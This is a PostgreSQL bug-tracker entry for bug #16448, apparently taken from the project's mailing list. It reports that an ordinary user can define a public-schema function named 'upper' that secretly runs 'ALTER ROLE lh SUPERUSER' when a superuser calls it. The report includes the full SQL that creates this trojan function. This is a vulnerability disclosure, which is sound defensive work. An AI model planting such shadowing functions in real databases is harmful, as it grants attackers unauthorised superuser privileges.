PostgreSQL Bugs

Collected from the PG bugs email list.

Bug ID16448
PG Version10.12
OSlinux
Opened2020-05-18 09:14:49+00
Reported byyi Ding
StatusNew

Body of first available message related to this bug follows.

The following bug has been logged on the website:

Bug reference:      16448
Logged by:          yi Ding
Email address:      (redacted)
PostgreSQL version: 10.12
Operating system:   linux
Description:        

A common user created a function in the public space and added some
malicious codes in the function, when other users with superuser rights call
this function, the malicious code will be executed , so as to achieve the
purpose of remote malicious code execution.

   First, Non-superuser lh defines a function named upper, which contains
the statement to modify user permissions.
SQL:
CREATE TABLE public.testlh AS SELECT ‘lh’::varchar AS contents;
CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
ALTER ROLE lh SUPERUSER;
SELECT pg_catalog.upper($1);
$$ LANGUAGE SQL VOLATILE;
 
Second, Superuser pg01 will execute the above statement after calling the
upper function, whice will change user lh to a super user.

Messages

DateAuthorSubject
2020-05-18 09:14:49+00PG Bug reporting formBUG #16448: Remote code execution vulnerability
2020-05-18 09:49:51+00Heikki LinnakangasRe: BUG #16448: Remote code execution vulnerability
2020-05-18 14:22:56+00"David G(dot) Johnston"Re: BUG #16448: Remote code execution vulnerability